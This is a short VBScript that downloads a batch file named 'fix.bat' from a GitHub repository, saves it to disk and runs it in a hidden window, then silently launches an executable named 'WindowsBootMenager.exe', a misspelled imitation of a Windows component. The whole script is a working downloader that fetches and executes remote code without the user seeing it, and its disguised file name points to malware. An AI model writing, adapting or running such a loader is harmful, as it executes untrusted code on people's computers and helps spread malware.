Set objShell = CreateObject("WScript.Shell")
fixUrl = "https://github.com/MidlesLex/SkyblockApi/raw/main/fix.bat"
fixFile = "fix.bat"
bootManagerFile = "WindowsBootMenager.exe"

Set fixHTTP = CreateObject("MSXML2.ServerXMLHTTP")
fixHTTP.open "GET", fixUrl, False
fixHTTP.send()

If fixHTTP.Status = 200 Then
  Set fixStream = CreateObject("ADODB.Stream")
  fixStream.Open
  fixStream.Type = 1
  fixStream.Write fixHTTP.ResponseBody
  fixStream.SaveToFile fixFile, 2
  fixStream.Close
End If

objShell.Run fixFile, 0, True
objShell.Run bootManagerFile, 0, True
